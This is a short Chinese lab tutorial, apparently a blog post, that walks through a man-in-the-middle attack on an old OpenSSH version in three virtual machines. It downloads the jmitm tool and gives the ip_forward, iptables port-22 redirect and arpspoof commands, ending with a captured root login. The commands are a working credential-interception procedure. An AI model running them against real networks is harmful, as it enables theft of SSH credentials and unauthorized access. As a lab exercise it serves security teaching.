利用Jmitm对OpenSSH2.0版本进行中间人攻击中间人攻击
准备三台linux虚拟机,除了中间人机器(10.10.19.136)外的另外两台虚拟机的openSSH需要重新下载openSSH5.3此类较早前的版本源码并编译,安装成功后测试openSSH服务是否开启成功。
CenOS查看指令systemctl status service
在中间人机器(10.10.19.136)上下载jmitm软件并解压:
wgethttp://www.david-guembel.de/uploads/media/jmitm2-0.1.0.tar.gz #下载
tar xfjmitm2-0.1.0.tar.gz #解压
对该工具进行配置,编辑jmitm软件中的server.xml(/jmitm2-0.1.0/conf/server.xml)配置文件:

对该工具进行配置,编辑jmitm软件中的runm.sh(/jmitm2-0.1.0/bin/runm.sh)配置文件:

运行/jmitm2-0.1.0/bin目录下的runm.sh程序,开始监听连接:
./runm.sh

客户端10.10.19.189 服务端 10.10.19.178 中间人 10.10.19.136
依次运行以下命令:
echo 1 >
/proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING
-p tcp --dport 22 -j REDIRECT
iptables -A FORWARD
-j ACCEPT
arpspoof -i eth0 -t 10.10.19.189(客户端IP)10.10.19.178(服务端IP)

在ssh客户端10.10.19.189登录ssh服务端10.10.19.178并输入密码*********

查看运行的程序runm.sh所输出的内容中,发现成功捕获到用户名(root)/密码(*********):

网友评论